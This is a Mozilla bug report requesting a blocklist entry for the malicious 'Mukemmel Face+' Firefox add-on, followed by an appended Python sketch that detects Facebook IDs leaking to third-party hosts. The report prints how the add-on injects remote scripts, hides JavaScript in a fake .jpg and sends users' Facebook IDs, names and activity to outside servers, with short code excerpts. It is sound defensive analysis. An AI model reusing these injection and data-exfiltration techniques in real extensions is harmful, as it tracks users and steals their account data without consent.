Closed Bug 748993 Opened 13 years ago Closed 13 years ago

Malicious "Mukemmel Face+" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Attachments

(1 file)

90.12 KB, application/octet-stream
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.163 Safari/535.19

Steps to reproduce:

Downloaded add-on from www.mukemmelface.com/firefox.html

Actual results:

- loads "adobeflashplayer.js" from XPI
  - code is based on the less malicious "SocialFixer" plugin
  - looks to see if it's on a Facebook or Google domain
  - uses HTML5 local storage plus cookies to maintain config/state
  - injects a <script> tag to load http://hadi.mukemmelface.com/mukemmelface.js?amtasak=<random_num> when on Facebook
  - or, injects a <script> tag to load http://hadi.mukemmelface.com/g.js?amtasak=<random_num> when on Google

- mukemmelface.js:
  - loads your public details into the DOM via a call to graph.facebook.com/<uid>&callback=cins
  - contains the spam URL http://hadi.mukemmelface.com/reklam.html
  - injects either a <script> tag to load http://hadi.mukemmelface.com/offline.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
  - ... or a <script> tag to load http://hadi.mukemmelface.com/zaza.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
  - and a <script> tag to load http://gator1620.hostgator.com/~vazgec/1333458695713783.jpg

- g.js: empty at the time the analysis was done

- offline.js / zaza.js (same file): JS to install a font

- 1333458695713783.jpg: not an image file, but javascript
  - sends your FB UID to http://get.buzzzapps.com/xpi/lechat/get_th.php?id_user="+FB_UID+"&ck="+userKey+"&me="+FB_UID (since this loads on every Facebook page load, it also sends the current Facebook URL you're viewing as a referrer, allowing them to track you on Facebook)
  - has the ability to send your FB UID and name to http://set.buzzzapps.com/xpi/lechat/register.php?name='+FB_NAME+'&fbid='+FB_UID
  - sends your FB UID to http://sp1.buzzzapps.com/sp/upload.php?id_user='+FB_UID+'
  - sends your FB UID to http://ads2.buzzzapps.com/xpi/css/'+a+'/'+FB_UID+'.css
  - makes an Ajax request to http://cdn.mukemmelface.com/MukemmelFace.js?amtasak=<random_number>
  - injects ads by appending to the FB ad unit via
    "<iframe id='"+pubid+"_fr' src='"+reklam+"?umtt="+utma+"&umte="+USER_TYPE+"&ub="+SEXE+"' style='border:0px;margin-left:0px' width='230' height='620' scrolling='no' ></iframe>"
  - sends your name and FB UID when you submit a bug report via http://set.buzzzapps.com/xpi/lechat/bugreport.php?message="&name="+FB_NAME+&fbid="+FB_UID
  - sends your name and FB UID to http://get.buzzzapps.com/xpi/lechat/get_all.php?id_post="+tableau_aid+"&id_user="+FB_UID+
  - posts details of what you do on Facebook via

    function setPost(aid,what){
        ajaxeur("http://set.buzzzapps.com/xpi/lechat/set.php?id_post="+aid+"&id_user="+FB_UID +"&type="+what,vide, function(){});
    }
    function unsetPost(aid,what){
        ajaxeur("http://set.buzzzapps.com/xpi/lechat/unset.php?id_post="+aid+"&id_user="+FB_UID +"&type="+what,vide, function(){});
    }

  - posts status updates to your Timeline / Wall

Expected results:

It shouldn't post your Facebook account information to a 3rd party server or post as you on Facebook without your consent.
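
Added example (not part of the bug report and not Mozilla tooling): a detection sketch for the exfiltration pattern described above, run over (request URL, Referer) pairs from a proxy or HAR export. It flags long numeric values that recur across several third-party endpoints requested from Facebook pages; the sample records, the UID value and all function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

NUMERIC_ID = re.compile(r"\d{8,20}")  # assumption: a UID is a long decimal string

def site(host):
    """Crude registrable domain (last two labels); enough for this sample."""
    return ".".join((host or "").lower().split(".")[-2:])

def find_uid_leaks(records, first_party="facebook.com", min_endpoints=2):
    """records: iterable of (request_url, referer) pairs.
    Returns {value: sorted third-party endpoints} for long numeric values that
    recur on at least `min_endpoints` third-party endpoints requested from
    first-party pages. One-off random cache-busters do not recur."""
    seen = defaultdict(set)
    for url, referer in records:
        req, ref = urlsplit(url), urlsplit(referer or "")
        if not req.hostname or site(ref.hostname) != first_party:
            continue                      # not issued from a first-party page
        if site(req.hostname) == first_party:
            continue                      # first-party traffic is expected
        candidates = [v for _, v in parse_qsl(req.query)]
        candidates += req.path.replace(".", "/").split("/")  # e.g. /<uid>.css
        for value in candidates:
            if NUMERIC_ID.fullmatch(value):
                seen[value].add(req.hostname + req.path)
    return {v: sorted(e) for v, e in seen.items() if len(e) >= min_endpoints}

# Constructed sample: hosts and paths follow the report, the UID is made up.
FB = "https://www.facebook.com/somepage"
SAMPLE = [
    ("http://get.buzzzapps.com/xpi/lechat/get_th.php"
     "?id_user=100000123456789&ck=abc&me=100000123456789", FB),
    ("http://sp1.buzzzapps.com/sp/upload.php?id_user=100000123456789", FB),
    ("http://ads2.buzzzapps.com/xpi/css/x/100000123456789.css", FB),
    ("http://cdn.mukemmelface.com/MukemmelFace.js?amtasak=8273645190", FB),
    ("https://www.facebook.com/ajax/foo?id=100000123456789", FB),
    ("http://static.example.net/lib.js?v=20120401", "https://news.example.org/"),
]

if __name__ == "__main__":
    for value, endpoints in find_uid_leaks(SAMPLE).items():
        print(value, "->", ", ".join(endpoints))
```
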
ID: {45147e67-4020-47e2-8f7a-55464fb535aa}
Assignee: nobody → jorge
Status: UNCONFIRMED → NEW
Ever confirmed: true
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit